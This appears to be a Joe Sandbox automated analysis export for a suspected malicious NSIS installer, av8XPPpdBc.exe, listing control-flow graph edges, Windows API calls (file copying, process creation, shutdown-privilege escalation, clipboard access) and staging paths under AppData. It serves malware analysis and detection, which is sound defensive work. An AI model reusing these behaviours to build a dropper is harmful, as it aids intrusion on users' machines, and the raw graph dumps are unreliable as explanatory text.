3377 406425 3 API calls 3373->3377 3376 403c53 3374->3376 3482 403eff 3376->3482 3377->3374 3380 405f2e 18 API calls 3381 403cd6 3380->3381 3382 403d6a 3381->3382 3385 406425 
3 API calls 3381->3385 3383 405f2e 18 API calls 3382->3383 3384 403d70 3383->3384 3386 403d80 LoadImageW 3384->3386 3388 406594 21 API calls 3384->3388 3387 403d08 3385->3387 3389 403e26 3386->3389 3390 403da7 RegisterClassW 3386->3390 3387->3382 3391 403d29 lstrlenW 3387->3391 3394 405e53 CharNextW 3387->3394 3388->3386 3393 40140b 2 API calls 3389->3393 3392 403ddd SystemParametersInfoW CreateWindowExW 3390->3392 3422 403e30 3390->3422 3395 403d37 lstrcmpiW 3391->3395 3396 403d5d 3391->3396 3392->3389 3397 403e2c 3393->3397 3398 403d26 3394->3398 3395->3396 3399 403d47 GetFileAttributesW 3395->3399 3400 405e26 3 API calls 3396->3400 3402 403eff 22 API calls 3397->3402 3397->3422 3398->3391 3401 403d53 3399->3401 3403 403d63 3400->3403 3401->3396 3404 405e72 2 API calls 3401->3404 3405 403e3d 3402->3405 3498 406557 lstrcpynW 3403->3498 3404->3396 3407 403e49 ShowWindow 3405->3407 3408 403ecc 3405->3408 3410 4068db 3 API calls 3407->3410 3490 4056af OleInitialize 3408->3490 3412 403e61 3410->3412 3411 403ed2 3414 403ed6 3411->3414 3415 403eee 3411->3415 3413 403e6f GetClassInfoW 3412->3413 3416 4068db 3 API calls 3412->3416 3418 403e83 GetClassInfoW RegisterClassW 3413->3418 3419 403e99 DialogBoxParamW 3413->3419 3421 40140b 2 API calls 3414->3421 3414->3422 3417 40140b 2 API calls 3415->3417 3416->3413 3417->3422 3418->3419 3420 40140b 2 API calls 3419->3420 3420->3422 3421->3422 3422->3274 3423->3261 3424->3308 3425->3277 3426->3303 3427->3306 3429 403b67 3428->3429 3430 403b59 CloseHandle 3428->3430 3510 403b94 3429->3510 3430->3429 3433 405c63 71 API calls 3434 403a82 OleUninitialize 3433->3434 3434->3283 3434->3284 3436 405bcc 3435->3436 3437 403a9d ExitProcess 3436->3437 3438 405be0 MessageBoxIndirectW 3436->3438 3438->3437 3440 401389 2 API calls 3439->3440 3441 401420 3440->3441 3441->3285 3442->3341 3443->3343 3444->3347 3446 403027 3445->3446 3447 40303f 3445->3447 3448 403030 DestroyWindow 3446->3448 3449 403037 3446->3449 3450 403047 3447->3450 3451 
40304f GetTickCount 3447->3451 3448->3449 3449->3350 3454 406987 2 API calls 3450->3454 3452 403080 3451->3452 3453 40305d CreateDialogParamW ShowWindow 3451->3453 3452->3350 3453->3452 3455 40304d 3454->3455 3455->3350 3456->3358 3459 4032d2 3457->3459 3458 403300 3461 4034d4 ReadFile 3458->3461 3459->3458 3481 4034ea SetFilePointer 3459->3481 3462 40330b 3461->3462 3463 40346d 3462->3463 3464 40331d GetTickCount 3462->3464 3466 403253 3462->3466 3465 4034af 3463->3465 3470 403471 3463->3470 3464->3466 3473 40336c 3464->3473 3468 4034d4 ReadFile 3465->3468 3466->3362 3466->3366 3467 4034d4 ReadFile 3467->3473 3468->3466 3469 4034d4 ReadFile 3469->3470 3470->3466 3470->3469 3471 4060f9 WriteFile 3470->3471 3471->3470 3472 4033c2 GetTickCount 3472->3473 3473->3466 3473->3467 3473->3472 3474 4033e7 MulDiv wsprintfW 3473->3474 3476 4060f9 WriteFile 3473->3476 3475 4055dc 28 API calls 3474->3475 3475->3473 3476->3473 3478 4060ca ReadFile 3477->3478 3479 4034e7 3478->3479 3479->3352 3480->3357 3481->3458 3483 403f13 3482->3483 3499 40649e wsprintfW 3483->3499 3485 403f84 3500 403fb8 3485->3500 3487 403cb4 3487->3380 3488 403f89 3488->3487 3489 406594 21 API calls 3488->3489 3489->3488 3503 404522 3490->3503 3492 4056f9 3493 404522 SendMessageW 3492->3493 3495 40570b CoUninitialize 3493->3495 3494 4056d2 3494->3492 3506 401389 3494->3506 3495->3411 3497->3376 3498->3382 3499->3485 3501 406594 21 API calls 3500->3501 3502 403fc6 SetWindowTextW 3501->3502 3502->3488 3504 40453a 3503->3504 3505 40452b SendMessageW 3503->3505 3504->3494 3505->3504 3508 401390 3506->3508 3507 4013fe 3507->3494 3508->3507 3509 4013cb MulDiv SendMessageW 3508->3509 3509->3508 3511 403ba2 3510->3511 3512 403b6c 3511->3512 3513 403ba7 FreeLibrary GlobalFree 3511->3513 3512->3433 3513->3512 3513->3513 4407 401a35 4408 402dab 21 API calls 4407->4408 4409 401a3e ExpandEnvironmentStringsW 4408->4409 4410 401a52 4409->4410 4412 401a65 4409->4412 4411 401a57 lstrcmpW 4410->4411 4410->4412 4411->4412 
4418 4023b7 4419 4023bf 4418->4419 4422 4023c5 4418->4422 4420 402dab 21 API calls 4419->4420 4420->4422 4421 4023d3 4424 4023e1 4421->4424 4425 402dab 21 API calls 4421->4425 4422->4421 4423 402dab 21 API calls 4422->4423 4423->4421 4426 402dab 21 API calls 4424->4426 4425->4424 4427 4023ea WritePrivateProfileStringW 4426->4427 4428 4014b8 4429 4014be 4428->4429 4430 401389 2 API calls 4429->4430 4431 4014c6 4430->4431 4432 402439 4433 402441 4432->4433 4434 40246c 4432->4434 4435 402deb 21 API calls 4433->4435 4436 402dab 21 API calls 4434->4436 4437 402448 4435->4437 4438 402473 4436->4438 4440 402dab 21 API calls 4437->4440 4441 402480 4437->4441 4443 402e69 4438->4443 4442 402459 RegDeleteValueW RegCloseKey 4440->4442 4442->4441 4444 402e76 4443->4444 4445 402e7d 4443->4445 4444->4441 4445->4444 4447 402eae 4445->4447 4448 4063c4 RegOpenKeyExW 4447->4448 4449 402edc 4448->4449 4450 402eec RegEnumValueW 4449->4450 4455 402f0f 4449->4455 4458 402f86 4449->4458 4451 402f76 RegCloseKey 4450->4451 4450->4455 4451->4458 4452 402f4b RegEnumKeyW 4453 402f54 RegCloseKey 4452->4453 4452->4455 4454 40694b 5 API calls 4453->4454 4456 402f64 4454->4456 4455->4451 4455->4452 4455->4453 4457 402eae 6 API calls 4455->4457 4456->4458 4459 402f68 RegDeleteKeyW 4456->4459 4457->4455 4458->4444 4459->4458 4460 40173a 4461 402dab 21 API calls 4460->4461 4462 401741 SearchPathW 4461->4462 4463 40175c 4462->4463 4464 401d3d 4465 402d89 21 API calls 4464->4465 4466 401d44 4465->4466 4467 402d89 21 API calls 4466->4467 4468 401d50 GetDlgItem 4467->4468 4469 40263d 4468->4469 4469->4469

Control-flow Graph
APIs
• SetErrorMode.KERNELBASE ref: 00403555
• GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403580
• GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403593
• lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040362C
• #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403669
• OleInitialize.OLE32(00000000), ref: 00403670
• SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 0040368F
• GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A4
• CharNextW.USER32(00000000,"C:\Users\user\Desktop\av8XPPpdBc.exe",00000020,"C:\Users\user\Desktop\av8XPPpdBc.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036DD
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403815
• GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403826
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403832
• GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040384E
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385F
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403867
• DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387B
• lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\av8XPPpdBc.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403954
  • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
• wsprintfW.USER32 ref: 004039B1
• GetFileAttributesW.KERNEL32( Hype,e",C:\Users\user\AppData\Local\Temp\), ref: 004039E4
• DeleteFileW.KERNEL32( Hype,e"), ref: 004039F0
• SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A1E
                                                                                                                                                                                        • Part of subcall function 00406317: MoveFileExW.KERNEL32(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321
                                                                                                                                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\av8XPPpdBc.exe, Hype,e",00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A34
                                                                                                                                                                                        • Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?, Hype,e",?), ref: 00405B63
                                                                                                                                                                                        • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?, Hype,e",?), ref: 00405B70
                                                                                                                                                                                        • Part of subcall function 004068B4: FindFirstFileW.KERNELBASE(?,0042FAB8,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,00000000,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,C:\Users\user\AppData\Local\Temp\nswE27F.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                                                                                                                                                                        • Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB
                                                                                                                                                                                      • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A82
                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00403A9F
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00438000,00438000,?, Hype,e",00000000), ref: 00403AA6
                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AC2
                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC9
                                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADE
                                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B01
                                                                                                                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B26
                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00403B49
                                                                                                                                                                                        • Part of subcall function 00405B05: CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                                                                                                                                      • String ID: Hype,e"$"C:\Users\user\Desktop\av8XPPpdBc.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\erstatningsgraden$C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers$C:\Users\user\Desktop$C:\Users\user\Desktop\av8XPPpdBc.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                                                                                                                                      • API String ID: 1813718867-3873721440

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      [Control-flow graph image; first block 40571b-405736]
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 00405779
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00405788
                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004057C5
                                                                                                                                                                                      • GetSystemMetrics.USER32(00000002), ref: 004057CC
                                                                                                                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057ED
                                                                                                                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FE
                                                                                                                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405811
                                                                                                                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581F
                                                                                                                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405832
                                                                                                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405854
                                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405868
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405889
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405899
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058B2
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BE
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 00405797
                                                                                                                                                                                        • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004058DB
                                                                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_000056AF,00000000), ref: 004058E9
                                                                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 004058F0
                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00405914
                                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405919
                                                                                                                                                                                      • ShowWindow.USER32(00000008), ref: 00405963
                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405997
                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 004059A8
                                                                                                                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059BC
                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004059DC
                                                                                                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F5
                                                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2D
                                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 00405A3D
                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 00405A43
                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4F
                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405A59
                                                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6D
                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405A8D
                                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405A98
                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00405A9E
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                      • String ID: {
                                                                                                                                                                                      • API String ID: 590372296-366298937

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      [Control-flow graph image; first block 405c63-405c89]
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • DeleteFileW.KERNELBASE(?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\av8XPPpdBc.exe"), ref: 00405C8C
                                                                                                                                                                                      • lstrcatW.KERNEL32(0042EA70,\*.*,0042EA70,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\av8XPPpdBc.exe"), ref: 00405CD4
                                                                                                                                                                                      • lstrcatW.KERNEL32(?,0040A014,?,0042EA70,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\av8XPPpdBc.exe"), ref: 00405CF7
                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\av8XPPpdBc.exe"), ref: 00405CFD
                                                                                                                                                                                      • FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\av8XPPpdBc.exe"), ref: 00405D0D
                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAD
                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00405DBC
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\av8XPPpdBc.exe"$C:\Users\user\AppData\Local\Temp\$\*.*$pB
                                                                                                                                                                                      • API String ID: 2035342205-2123459697

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,0042FAB8,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,00000000,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,C:\Users\user\AppData\Local\Temp\nswE27F.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 004068CB
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\nswE27F.tmp, xrefs: 004068B4
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nswE27F.tmp
                                                                                                                                                                                      • API String ID: 2295610775-1506623398

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404013
                                                                                                                                                                                      • ShowWindow.USER32(?), ref: 00404033
                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404045
                                                                                                                                                                                      • ShowWindow.USER32(?,00000004), ref: 0040405E
                                                                                                                                                                                      • DestroyWindow.USER32 ref: 00404072
                                                                                                                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040408B
                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 004040AA
                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BE
                                                                                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 004040C5
                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00404170
                                                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 0040417A
                                                                                                                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00404194
                                                                                                                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E5
                                                                                                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 0040428B
                                                                                                                                                                                      • ShowWindow.USER32(00000000,?), ref: 004042AC
                                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042BE
                                                                                                                                                                                      • EnableWindow.USER32(?,?), ref: 004042D9
                                                                                                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EF
                                                                                                                                                                                      • EnableMenuItem.USER32(00000000), ref: 004042F6
                                                                                                                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430E
                                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404321
                                                                                                                                                                                      • lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040434B
                                                                                                                                                                                      • SetWindowTextW.USER32(?,0042CA68), ref: 0040435F
                                                                                                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 00404493
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 121052019-0

Control-flow Graph (first block: 403c29-403c41)
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                                                                                                                                                                        • Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                                                                                                                                                                      • lstrcatW.KERNEL32(1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,76233420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\av8XPPpdBc.exe",00008001), ref: 00403CAA
                                                                                                                                                                                      • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\erstatningsgraden,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,76233420), ref: 00403D2A
                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\erstatningsgraden,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D3D
                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(: Completed), ref: 00403D48
                                                                                                                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\erstatningsgraden), ref: 00403D91
                                                                                                                                                                                        • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                                                                                                                                                                      • RegisterClassW.USER32(004336A0), ref: 00403DCE
                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE6
                                                                                                                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E1B
                                                                                                                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403E51
                                                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E7D
                                                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403E8A
                                                                                                                                                                                      • RegisterClassW.USER32(004336A0), ref: 00403E93
                                                                                                                                                                                      • DialogBoxParamW.USER32(?,00000000,00403FD7,00000000), ref: 00403EB2
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\av8XPPpdBc.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\erstatningsgraden$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                      • API String ID: 1975747703-1677173953

Control-flow Graph (first block: 403082-4030d0)
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00403093
                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\av8XPPpdBc.exe,00000400), ref: 004030AF
                                                                                                                                                                                        • Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\av8XPPpdBc.exe,80000000,00000003), ref: 0040604B
                                                                                                                                                                                        • Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\av8XPPpdBc.exe,C:\Users\user\Desktop\av8XPPpdBc.exe,80000000,00000003), ref: 004030FB
                                                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\av8XPPpdBc.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\av8XPPpdBc.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                      • API String ID: 2803837635-1768121561

Control-flow Graph (first block: 406594-40659d)
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004066B6
                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,antholite,?,?,00000000,00000000,00424620,762323A0), ref: 004066CC
                                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 0040672A
                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406733
                                                                                                                                                                                      • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch,00000000,antholite,?,?,00000000,00000000,00424620,762323A0), ref: 0040675E
                                                                                                                                                                                      • lstrlenW.KERNEL32(: Completed,00000000,antholite,?,?,00000000,00000000,00424620,762323A0), ref: 004067B8
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmp
